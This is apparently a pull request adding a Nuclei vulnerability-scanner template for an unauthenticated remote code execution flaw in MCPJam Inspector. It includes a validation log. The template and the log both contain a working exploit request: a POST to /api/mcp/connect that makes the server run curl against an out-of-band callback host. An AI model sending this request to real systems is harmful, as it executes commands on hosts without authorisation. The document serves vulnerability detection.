### PR TITLE
MCPJam Inspector - Unauthenticated Remote Code Execution

### DIFF
--- a/http/cves/2026/CVE-2026-23744.yaml
+++ b/http/cves/2026/CVE-2026-23744.yaml
@@ -1,34 +1,30 @@
 id: CVE-2026-23744
 
 info:
-  name: MCPJam Inspector - Unauthenticated Remote Code Execution
+  name: MCPJam Inspector - Remote Code Execution
   author: Louay-075
   severity: critical
   description: |
-    MCPJam inspector is the local-first development platform for MCP servers.
-    The Latest version Versions 1.4.2 and earlier are vulnerable to remote code execution (RCE) vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE.
+    MCPJam inspector is the local-first development platform for MCP servers. The Latest version 1.4.2 and earlier are vulnerable to a remote code execution (RCE) vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE.
   impact: |
-    An unauthenticated attacker can remotely execute arbitrary system
-    commands via the exposed /api/mcp/connect endpoint. Successful
-    exploitation leads to full compromise of the affected host.
+    An unauthenticated attacker can remotely execute arbitrary system commands via the exposed /api/mcp/connect endpoint. Successful exploitation leads to full compromise of the affected host.
   remediation: |
-    Upgrade MCPJam Inspector to version 1.4.3 or later. Restrict the
-    service to listen on 127.0.0.1.
+    Upgrade MCPJam Inspector to version 1.4.3 or later. Restrict the service to listen on 127.0.0.1.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-23744
-    - https://github.com/advisories/GHSA-232v-j27c-5pp6
     - https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6
+    - https://github.com/advisories/GHSA-232v-j27c-5pp6
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-23744
   classification:
-    cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cve-id: CVE-2026-23744
     cwe-id: CWE-306
-    cvss-score: 9.8
   metadata:
     verified: true
     max-request: 1
     vendor: mcpjam
     product: mcpjam
-  tags: cve,cve2026,rce,unauthenticated,mcpjam
+  tags: cve,cve2026,rce,mcpjam,oast
 
 http:
   - raw:
@@ -39,31 +35,11 @@ http:
 
         {"serverConfig":{"timeout":10000,"command":"curl","args":["{{interactsh-url}}"],"env":{}},"serverId":"mymcp"}
 
-    matchers-condition: and
     matchers:
-      - type: word
-        part: body
-        words:
-          - "Connection failed for server"
-          - "MCP error"
+      - type: dsl
+        dsl:
+          - 'contains_all(body, "Connection failed for server", "MCP error")'
+          - 'contains(content_type, "application/json")'
+          - 'contains(interactsh_protocol, "dns")'
+          - 'status_code == 500'
         condition: and
-
-      - type: word
-        words:
-          - "true"
-
-        negative: true
-
-      - type: word
-        part: content_type
-        words:
-          - application/json
-
-      - type: word
-        part: interactsh_protocol
-        words:
-          - "dns"
-
-      - type: status
-        status:
-          - 500


### PR DESCRIPTION
### PR Information

- Added template for CVE-2026-23744
- References:
  - https://nvd.nist.gov/vuln/detail/CVE-2026-23744
  - https://github.com/advisories/GHSA-232v-j27c-5pp6
  - https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6

This template detects an unauthenticated Remote Code Execution vulnerability in MCPJam Inspector versions ≤ 1.4.2 via the `/api/mcp/connect` HTTP endpoint.  
The endpoint processes attacker-controlled `command` input without authentication, resulting in execution attempts and error responses consistent with the vulnerability.

---

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

Template validated locally using:

```

nuclei -u http://127.0.0.1:6274 -t CVE-2026-23744.yaml -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.6.2

                projectdiscovery.io

[INF] Current nuclei version: v3.6.2 (latest)
[INF] Current nuclei-templates version: v10.3.7 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 102
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2026-23744] Dumped HTTP request for http://127.0.0.1:6274/api/mcp/connect

POST /api/mcp/connect HTTP/1.1
Host: 127.0.0.1:6274
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 102
Content-Type: application/json
Accept-Encoding: gzip

{"serverConfig":{"timeout":10000,"command":"curl","args":["ifconfig.me"],"env":{}},"serverId":"mymcp"}
[DBG] [CVE-2026-23744] Dumped HTTP response http://127.0.0.1:6274/api/mcp/connect

HTTP/1.1 500 Internal Server Error
Connection: close
Content-Length: 147
Access-Control-Allow-Credentials: true
Content-Type: application/json
Date: Sat, 17 Jan 2026 15:01:05 GMT
Vary: Origin

{"success":false,"error":"Connection failed for server mymcp: MCP error -32000: Connection closed","details":"MCP error -32000: Connection closed"}
[CVE-2026-23744:word-2] [http] [critical] http://127.0.0.1:6274/api/mcp/connect
[CVE-2026-23744:word-3] [http] [critical] http://127.0.0.1:6274/api/mcp/connect
[CVE-2026-23744:status-4] [http] [critical] http://127.0.0.1:6274/api/mcp/connect
[CVE-2026-23744:word-1] [http] [critical] http://127.0.0.1:6274/api/mcp/connect
[INF] Scan completed in 559.1614ms. 4 matches found.

```

```
✅ 🌐 Browser opened at http://127.0.0.1:6274
┌─────────────────────────┐
│       🎵 MCPJam         │
├─────────────────────────┤
│ http://127.0.0.1:6274   │
└─────────────────────────┘

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    13  100    13    0     0     44      0 --:--:-- --:--:-- --:--:--    44
```
The scan confirms vulnerable behavior by observing execution-related MCP error responses from the `/api/mcp/connect` endpoint.


